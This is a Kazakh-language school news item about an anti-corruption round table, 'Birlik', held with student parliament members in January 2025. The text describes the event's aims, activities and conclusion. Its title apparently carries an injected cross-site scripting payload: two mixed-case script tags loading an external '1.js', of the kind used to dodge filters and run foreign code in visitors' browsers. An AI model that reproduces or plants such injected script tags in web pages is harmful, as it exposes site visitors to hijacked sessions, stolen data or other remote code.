Сыбайластық жемқорлыққа қарсы іс-қимыл бойынша "Бірлік"<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.01.2025

Тоқтамыс ауылының жалпы білім беретін мектебі" КММ-де сыбайластық жемқорлыққа қарсы іс-қимыл бойынша "Бірлік" тақырыбында мектеп Парламентінің мүшелерімен дөңгелек үстел өткізілді. 
Мақсаты: Балаларда сыбайлас жемқорлыққа қатысты азаматтық ұстанымды қалыптастыру үшін қажетті құндылық көзқарастарын тәрбиелеу және қабілеттерін дамыту. 
Міндеттері: 
Білім беру: білім алушыларда сыбайлас жемқорлыққа қарсы дүниетанымды тәрбиелеу, насихаттау және қалыптастыру.
 Дамытушы: құқықтық сананың, азаматтық ұстанымның дамуына ықпал ету, алынған мәліметтер негізінде қорытынды жасай білу. 
Тәрбиелік: балалардың жеке басының негізін құрайтын моральдық нормаларға оң көзқарасын тәрбиелеу, құқықтық мәдениеттің құқықтық сана деңгейін арттыру. 
Сабақ барысы: 
1. Сыбайластық жемқорлық туралы астарлы әңгімені тыңдап, талдадық. 
2. Сабақтың теориялық бөлігінде мынадай мәселелер қарастырылды: сыбайлас жемқорлық дегеніміз не; сыбайлас жемқорлық қандай нысандарда көрінеді; сыбайлас жемқорлықтың себептері. 
3. Тренинг өткізілді, онда балалар жағдайларды ойнады. 
4. Ребустар шешілді тапсырмаларды орындады. 
Қорытынды: сыбайлас жемқорлық-экономикалық өсу мен дамуға кедергі, кез келген өзгерістерге қауіп төндіреді.


Аға тәлімгер: Доматай М

Просмотров: 662


Пікір қосу



Деректерді қолтаңбаға қосу